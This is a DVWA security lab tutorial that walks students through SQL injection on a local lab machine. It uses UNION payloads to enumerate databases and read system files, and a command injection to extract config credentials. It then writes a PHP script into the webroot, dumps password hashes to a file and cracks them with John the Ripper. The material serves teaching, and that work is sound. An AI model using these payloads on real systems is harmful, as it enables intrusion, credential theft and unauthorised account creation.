ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Damn Vulnerable Web App >> DVWA v1.0.7 >> Current Page |Views: 80651

(Damn Vulnerable Web App (DVWA): Lesson 15)

{ 'union exploit, create_user.php, John The Ripper  }


Section 0. Background Information
  1. What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

  2. What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  3. Union Exploitation Technique
    • The UNION operator is used in SQL injections to join or attach an additional select statement to the original query to obtain values of columns from other tables.
    • Original Query
      • SELECT first_name, last_name FROM users WHERE user_ID = '$id'
    • Exploited Query
      • SELECT first_name, last_name FROM users WHERE user_ID = '' union select user, password from dvwa.users -- '

  4. John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash.


  5. Pre-Requisite Labs
  6. Lab Notes
    • In this lab we will do the following:
      1. We will use the SQL Union function to interrogate and inspect various databases and tables..
      2. We will use the MySQL LOAD_DATA() function inspect operating system files.
      3. We will use the SQL Union function to create a php script that will create new user in the dvwa.users table.
      4. We will dump the dvwa.users table into a web enabled file.
      5. We will download and crack the dvwa password file with John the Ripper.

  7. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2014 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit Fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

 

Section 2: Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine

     

  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

     

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.118.
      • Please record your IP address.

     

Section 4: Fix Upload Ownership and Permissions
  1. Fix Ownership and Permissions
    • Instructions:
      1. cd /var/www/html
      2. chown apache:mysql dvwa
      3. chmod 770 dvwa
      4. ls -l
    • Note(FYI):
      1. By default, the /var/www/html/dvwa directory is both user and group owned by root.
      2. We are going to change the ownerships and permissions to where mysql can write to the /var/www/html/dvwa application directory.  
      3. This ownership/permission poor mis-configuration change is done to illustrate the magnitude of the SQL Injection attack vector. 

 

Section 5: Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

 

Section 6: Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 7: Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.119.
      • Please record your IP address.

     

Section 8: Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox

     

  2. Login to DVWA
    • Instructions:
      1. Place http://192.168.1.118/dvwa/login.php in the address bar.
        • Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
      2. Login: admin
      3. Password: password
      4. Click on Login

 

Section 9: Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit

     

Section 10: Explaining the SQL Injection (SQLi) Weakness
  1. SQL Injection Menu (On BackTrack)
    • Instructions:
      1. Click on SQL Injection (Left Navigation Menu)
      2. Notice that the program association with the SQL Injection form is located in /dvwa/vulnerabilities/sqli/

     

  2. View index.php (On Fedora)
    • Instructions:
      1. cd /var/www/html/dvwa/vulnerabilities/sqli
      2. ls -lrta
      3. gedit index.php 2>/dev/null &
    • Note(FYI):
      1. The sqli directory contains the main SQL Injection programs and contents.
      2. The main or controller SQL Injection program is called index.php.  In the following steps, we will see how index.php will call either the source/low.php, source/medium.php, or source/high.php depending on your Security Setting.
      3. Let's take a look at index.php with the gedit editor

     

  3. sqli code explanation (On Fedora)
    • Instructions:
      1. Since, our Security Setting is set to "low", the low.php program will be displayed.
      2. Close index.php

     

  4. View low.php (On Fedora)
    • Instructions:
      1. gedit /var/www/html/dvwa/vulnerabilities/sqli/source/low.php 2>/dev/null &
    • Note(FYI):
      • Now we will view low.php, where the SQL Injection form is set to it's weakest level of security.

     

  5. Explain low.php
    • Instruction:
      1. $_GET['Submit'], refers to that action of the user clicking on the submit button.
      2. $_GET['id'], assign the value from the text boxed named "id" to the variable $id.
      3. The $id variable is placed in the following SQL statement
        • SELECT first_name, last_name FROM users WHERE user_id = '$id'
      4. first_name, last_name are the two parameters selected from table "users" if a particular user_id is found.
      5. = '$id', we will attack the last single quote (') to display adverse results and write through results to output files.
      6. Close low.php

     

Section 11: Basic SQL Injection (SQLi) Techniques
  1. SQL Injection Menu (On BackTrack)
    • Instructions:
      1. Click on SQL Injection (Left Navigation Menu)
      2. Place "1" in the textbox
      3. Click the Submit Button
        • The Submit button corresponds to $_GET['Submit'] in low.php
      4. Notice that First Name (aka first_name) and Surname (aka last_name) are displayed in the results.

     

  2. Single Quote Test
    • Instructions:
      1. Click on SQL Injection (Left Navigation Menu)
      2. Place a single quote ' in the textbox
      3. Click the Submit button

     

  3. Single Quote Error
    • Instructions:
      1. Notice there are 5 singles quotes (').  The single quote we supplied above caused a single quote mis-match syntax issue, which cause a MySQL Error.
      2. Click the Back Arrow

     

  4. Column Parameter Test (Part 1)
    • Instructions:
      1. Click on SQL Injection (Left Navigation Menu)
      2. Place 'union select 1 --  in the textbox
        • Make sure you add a space before and after the hyphens " -- "
      3. Click the Submit button

     

  5. Column Parameter Results (Part 1)
    • Instructions:
      1. Notice that message states that our UNION injection does not match the correct number of columns.
      2. Remember the SQL statement will provide two columns (first_name, last_name) a positive match is found.
    • Note(FYI):
      1. When using the MySQL UNION function, you must match up the number of columns and data types with the vulnerable select statement in the clause.
      2. Our attempt failed because we only provided one column instead of two columns. 

     

  6. Column Parameter Test (Part 2)
    • Instructions:
      1. Click on SQL Injection (Left Navigation Menu)
      2. Place 'union select 1,2 --  in the textbox
        • Make sure you add a space before and after the hyphens " -- "
      3. Click the Submit button
      4. We successfully inputted the matching amount of columns to satisfies the columns (first_name,last_name) in the vulnerable select statement.
        • SELECT first_name, last_name FROM users WHERE user_id = '$id'

 

Section 12: SQL Injection (SQLi) Database Vendor & Operating System Interrogation
  1. Inspect Element (Textbox)
    • Instructions:
      1. Click the SQL navigation link.
      2. Right Click on the Textbox
      3. Click Inspect Element

     

  2. Add New Attribute
    • Instructions:
      1. Right Click on the gray highlighted line
      2. Select New Attribute...

     

  3. Increase the Textbox Size
    • Instructions:
      1. Type the following: size=100
      2. Click on the close button

     

  4. Determine Database Vendor
    • Instructions:
      1. Place the following in the text box: ' UNION ALL SELECT @@datadir, 1 --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. The results provide us with two interesting pieces of data
        1. @@datadir, This is the database directory is /var/lib/mysql/
        2. We also know this is a MySQL database
      4. Click the Back Arrow

     

  5. Determine Database Version and Port Number
    • Instructions:
      1. Place the following in the text box:
        • ' UNION ALL SELECT @@version, @@port --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. The results provide us with the database version and port number
        1. @@version = 5.1.60
        2. @@port = 3306
      4. Click the Back Arrow

     

  6. Determine Server Hostname and OS Type
    • Instructions:
      1. Place the following in the text box:
        • ' UNION ALL SELECT @@hostname, @@version_compile_os --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. The results provide us with the database version and port number
        1. @@hostname = The hostname is Fedora14
        2. @@version_compile_os = The type of operating system on which MySQL was built
      4. Click the Back Arrow

     

  7. Determine Server Hostname and OS Type
    • Instructions:
      1. Place the following in the text box:
        • ' union select null, LOAD_FILE('/etc/system-release') --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. In this case, we used the MySQL LOAD_FILE() function to display the Linux Release Version
      4. Click the Back Arrow
    • Note(FYI):
      1. MySQL LOAD_FILE() reads the file and returns the file contents as a string.

 

Section 13: SQL Injection (SQLi) Database Schema & Table Interrogation
  1. Inspect Element (Textbox)
    • Instructions:
      1. Click the SQL navigation link.
      2. Right Click on the Textbox
      3. Click Inspect Element

     

  2. Add New Attribute
    • Instructions:
      1. Right Click on the gray highlighted line
      2. Select New Attribute...

     

  3. Increase the Textbox Size
    • Instructions:
      1. Type the following: size=100
      2. Click on the close button

     

  4. Determine Database Names
    • Instructions:
      1. Place the following in the text box:
        • ' UNION select distinct(table_schema),null FROM information_schema.tables --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. The INFORMATION_SCHEMA is the MySQL information database.
        • It is the place that stores information about all the other databases that the MySQL server maintains.
        • distinct(table_schema), this tells MySQL to only display duplicate rows one.  As in only show the database names one.
        • table_schema is the name of the database.
      4. Click the Back Arrow
    • Note(FYI):
      • The results displays three database Schemas (aka names): information_schema, dvwa, and mysql

     

  5. Determine Database Names and Table Counts
    • Instructions:
      1. Place the following in the text box:
        • ' UNION select distinct(table_schema),count(*) FROM information_Schema.tables group by table_schema --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. This is very similar to the previous query, except we are using count(*) and group by table_schema to determine the number of tables per database.
        • distinct(table_schema), this tells MySQL to only display duplicate rows one.  As in only show the database names one.
        • count(*), this counts the number of records.
        • group by table_schema, this groups by the table_schema column.
      4. Click the Back Arrow
    • Note(FYI):
      • The results now displays the number of tables contained in each database.

     

  6. Determine Table Names for the DVWA Database
    • Instructions:
      1. Place the following in the text box:
        • ' UNION select table_schema,table_name FROM information_Schema.tables where table_schema = "dvwa" --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. We will use the where clause to only display results for the dvwa database.
        • where table_schema = "dvwa", show only records where the database name is dvwa.
        • table_schema displays the name of the database
        • table_name displays the name of the table.
      4. Click the Back Arrow
    • Note(FYI):
      • The results now displays that the dvwa database contains two tables: guestbook and users.

     

  7. Determine Column Names for the DVWA.USERS Table
    • Instructions:
      1. Place the following in the text box:
        • ' UNION select COLUMN_NAME,DATA_TYPE FROM information_schema.columns where TABLE_SCHEMA = "dvwa" and TABLE_NAME = "users" --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. The INFORMATION_SCHEMA.COLUMNS view allows you to get information about all columns for all tables and views within a database.
        • COLUMN_NAME is the name of the column.
        • DATA_TYPE refers to the data type (int,varchar,etc) of a particular COLUMN_NAME.
        • where TABLE_SCHEMA = "dvwa" and TABLE_NAME = "users", show only records for the users table inside the dvwa database.
      4. Click the Back Arrow
    • Note(FYI):
      • The results now displays each column name and it's corresponding data type.
      • In the following steps, We will use these column names to build a php script to add a user to the DVWA.USERS table.

     

Section 14: Determine Database Password with Command Injection
  1. Inspect Element (Textbox)
    • Instructions:
      1. Click the Command link.
      2. Right Click on the Textbox
      3. Click Inspect Element
     
  2. Change Textbox Length
    • Instructions:
      1. Click on 30 and type 85
      2. Click on the Close Button

     

  3. Retrieve DVWA Database Username and Password From Config File
    • Instructions:
      1. Place the following command in the textbox
        • 127.0.0.1; find /var/www/html/dvwa/* -name "*config*" -print | xargs egrep -i '(database|user|password)'
      2. Click on the Submit Button
      3. Record the DVWA Database Username and Password
    • Note(FYI):
      1. Typically, poorly configured website applications will actually put the database credentials in a configuration page similar to the one below.
      2. A countermeasure could be to (1) never provide a command execution option and (2) to use encrypted files to store the database credentials in a non-web-accessible directory.

 

Section 15: Create PHP DVWA Create User Script
  1. Inspect Element (Textbox)
    • Instructions:
      1. Click the SQL navigation link.
      2. Right Click on the Textbox
      3. Click Inspect Element

     

  2. Add New Attribute
    • Instructions:
      1. Right Click on the gray highlighted line
      2. Select New Attribute...

     

  3. Increase the Textbox Size
    • Instructions:
      1. Type the following: size=100
      2. Click on the close button

     

  4. Determine Database Names
    • Instructions:
      1. Place the following in the text box:
        • ' union select null,'<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username = $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo "first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username: $username<BR>"; echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","dvwaPASSWORD","dvwa"); if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to database<BR>"; } $password = "abc123"; $sql="insert into dvwa.users values (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID" value="33"><br> <input type="text" name="first_name" value="John"><br> <input type="text" name="last_name" value="Gray"><br> <input type="text" name="username" value="jgray"><br> <input type="text" name="avatar" value="Just Hack It!"><br> <input type="submit" name="submit" value="Submit Form"><br> </form>' INTO DUMPFILE '/var/www/html/dvwa/create_user.php' --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
        • Note that no results will be displayed.
      3. Open another Web Browser Tab
    • Note(FYI):
      • General Injection Structure
        • ' union select null,'This is the PHP/HTML Code that we injected' INTO DUMPFILE 'This is the webpage file we created' --
      • Database Insert
        • $sql="insert into dvwa.users values (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")";
      • Default Password
        • $password = "abc123"; Note that "abc123" will be the default password for any user that you create in the next step.

     

  5. Test create_user.php
    • Instructions:
      1. Place http://192.168.1.118/dvwa/create_user.php in the address bar.
        • Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
      2. Replace "John" with your first name.
      3. Replace "Gray" with your last name.
      4. Replay "jgray" with your username.
      5. Click the Submit Form Button
    • Note(FYI):
      1. If you create more than one user, you will need to change the number "33" to something that already has not been used.
      2. The user_id field is a primary key, which cannot contain duplicate numbers.

 

Section 16: View DVWA User Creation Results
  1. Inspect Element (Textbox)
    • Instructions:
      1. Click on the Damn Vulnerable Web App Tab
      2. Click the SQL navigation link.
      3. Right Click on the Textbox
      4. Click Inspect Element

     

  2. Add New Attribute
    • Instructions:
      1. Right Click on the gray highlighted line
      2. Select New Attribute...

     

  3. Increase the Textbox Size
    • Instructions:
      1. Type the following: size=100
      2. Click on the close button

     

  4. Display DVWA Usernames and Passwords
    • Instructions:
      1. Place the following in the text box:
        • ' union select null, concat(first_name,0x3a,last_name,0x3a,user,0x3a,password) from users --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. Notice the last record will display the newly created user.
      4. Click the Back Arrow
    • Note(FYI):
      • concat,concatenates the tables columns first_name, last_name, user and password.
      • 0x3a,is the the hexidecimal representation for a colon(:).
      • from users,refers to the users tables in the dvwa database.

     

  5. Display DVWA Usernames and Passwords
    • Instructions:
      1. Place the following in the text box:
        • ' UNION select null,concat(first_name,0x3a,last_name,0x3a,user,0x3a,password) from dvwa.users INTO OUTFILE '/var/www/html/dvwa/dvwa_passwords.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' --
        • Remember to put a space before and after the two hyphens  --
      2. Click the Submit Button
      3. No results will be displayed on the screen, since the records were written to a file.
      4. Click on the Second Browser Tab
    • Note(FYI):
      • INTO OUTFILE '/var/www/html/dvwa/dvwa_passwords.txt', this tells MySQL to write the results to a file called dvwa_passwords.txt.
      • FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n',this formats the file is a csv format.

     

  6. View the DVWA Password File
    • Instructions:
      1. Place http://192.168.1.118/dvwa/dvwa_passwords.txt in the address bar.
        • Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
      2. Notice all the user ID information was written to the dvwa_passwords.txt file, alone with the newly created user.

     

Section 17: Remotely Download DVWA Password File
  1. Start Firefox (On BackTrack)
    • Instructions:
      1. Click on the console terminal

     

  2. Download the DVWA Password File
    • Instructions:
      1. cd /var/tmp
      2. wget http://192.168.1.118/dvwa/dvwa_passwords.txt
        • Replace 192.168.1.118 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3)
      3. cat dvwa_passwords.txt
      4. cat /var/tmp/dvwa_passwords.txt | awk -F: '{print $3":"$4}' | sed 's/"//g' > dvwa.txt
      5. cat dvwa.txt
    • Note(FYI):
      1. wget, This is a utility to download files from the internet.
      2. cat, This utility displays the contents of a file
      3. awk, This utility provides the ability to parse columns from a file based on a delimiter.  In this case, we are asking awk(awk -F:) to display back columns 3 and 4.
      4. sed, This is a stream editor.  In this case, it allow us to replace a double quote ("), with nothing.

 

Section 18: Proof of Lab
  1. Proof of Lab (On BackTrack)
    • Instructions:
      1. cd /pentest/passwords/john
      2. cat /dev/null > john.pot
      3. ./john --format=raw-MD5 /var/tmp/dvwa.txt
      4. date
      5. echo "Your Name"
    • Note(FYI):
      • Command #2, Use cat and the null device (/dev/null) to clear out the (john.pot) file by redirecting (>) null output into it.  The (john.pot) file contains previously guessed passwords.  If the password has already been correctly guessed, then the password will not be displayed, unless you use the (--show) flag.
      • Command #3, use (john) to attempt to crack the database passwords.  Use the flag (--format=raw-MD5) to tell (john) that the password is using a database(MD5) cipher.
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Upload to Moodle

 



Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth